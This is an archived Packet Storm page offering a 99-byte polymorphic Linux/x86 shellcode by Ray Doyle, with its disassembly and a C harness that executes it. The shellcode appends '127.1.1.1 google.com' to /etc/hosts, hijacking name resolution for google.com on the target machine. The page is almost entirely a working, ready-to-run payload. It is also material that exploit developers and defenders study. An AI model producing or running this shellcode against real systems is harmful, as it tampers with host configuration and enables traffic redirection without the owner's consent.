Twenty Year Anniversary

Linux/x86 File Modification(/etc/hosts) Polymorphic Shellcode

Linux/x86 File Modification(/etc/hosts) Polymorphic Shellcode
Posted Sep 14, 2018
Authored by Ray Doyle

99 bytes small Linux/x86 file modification (/etc/hosts) polymorphic shellcode.

tags | x86, shellcode
systems | linux
MD5 | b6b68473df8cea8e32cab90f6a2fb2df

Linux/x86 File Modification(/etc/hosts) Polymorphic Shellcode

Change Mirror Download
/* 
# Title: Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Tested on: Linux/x86
# gcc -o poly_hosts_shellcode -z execstack -fno-stack-protector poly_hosts_shellcode.c
*/

/****************************************************
Disassembly of section .text:

08048060 <_start>:
8048060: 29 c9 sub ecx,ecx
8048062: 51 push ecx

08048063 <open>:
8048063: 6a 05 push 0x5
8048065: 58 pop eax
8048066: 68 6f 73 74 73 push 0x7374736f
804806b: 68 74 63 2f 68 push 0x682f6374
8048070: 68 2f 2f 2f 65 push 0x652f2f2f
8048075: 54 push esp
8048076: 5b pop ebx
8048077: 51 push ecx
8048078: 41 inc ecx
8048079: b5 04 mov ch,0x4
804807b: cd 80 int 0x80
804807d: 93 xchg ebx,eax
804807e: 6a 04 push 0x4
8048080: 58 pop eax

08048081 <write>:
8048081: 68 2e 63 6f 6d push 0x6d6f632e
8048086: 68 6f 67 6c 65 push 0x656c676f
804808b: 68 31 20 67 6f push 0x6f672031
8048090: 68 31 2e 31 2e push 0x2e312e31
8048095: 68 31 32 37 2e push 0x2e373231
804809a: 54 push esp
804809b: 59 pop ecx
804809c: 6a 14 push 0x14
804809e: 5a pop edx
804809f: cd 80 int 0x80

080480a1 <close>:
80480a1: 92 xchg edx,eax
80480a2: b0 06 mov al,0x6
80480a4: cd 80 int 0x80

080480a6 <exit>:
80480a6: 31 c0 xor eax,eax
80480a8: 40 inc eax
80480a9: cd 80 int 0x80
****************************************************/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x29\xc9\x51\x6a\x05\x58\x68\x6f\x73\x74\x73\x68\x74\x63\x2f\x68\x68\x2f\x2f\x2f\x65\x54\x5b\x51\x41\xb5\x04\xcd\x80\x93\x6a\x04\x58\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x31\x20\x67\x6f\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x54\x59\x6a\x14\x5a\xcd\x80\x92\xb0\x06\xcd\x80\x31\xc0\x40\xcd\x80";

main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close